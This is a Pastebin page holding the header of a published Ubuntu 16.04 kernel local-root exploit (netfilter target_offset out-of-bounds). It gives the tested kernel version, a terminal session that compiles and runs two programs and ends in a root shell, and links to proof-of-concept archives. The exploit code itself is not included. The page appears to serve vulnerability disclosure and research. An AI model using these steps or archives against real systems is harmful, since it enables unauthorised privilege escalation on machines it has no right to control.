Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Source: https://twitter.com/vnik5287/status/748843859065483264
- /**
- * Ubuntu 16.04 local root exploit - netfilter target_offset OOB
- * check_compat_entry_size_and_hooks/check_entry
- *
- * Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
- *
- * Vitaly Nikolenko
- * vnik@cyseclabs.com
- * 23/04/2016
- *
- *
- * ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
- * automatic loading).
- *
- * vnik@ubuntu:~$ uname -a
- * Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
- * vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
- * vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
- * vnik@ubuntu:~$ ./decr
- * netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
- * [!] Decrementing the refcount. This may take a while...
- * [!] Wait for the "Done" message (even if you'll get the prompt back).
- * vnik@ubuntu:~$ [+] Done! Now run ./pwn
- *
- * vnik@ubuntu:~$ ./pwn
- * [+] Escalating privs...
- * root@ubuntu:~# id
- * uid=0(root) gid=0(root) groups=0(root)
- * root@ubuntu:~#
- *
- */
- Proof of Concept:
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
- https://cyseclabs.com/exploits/target_offset_vnik.zip
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement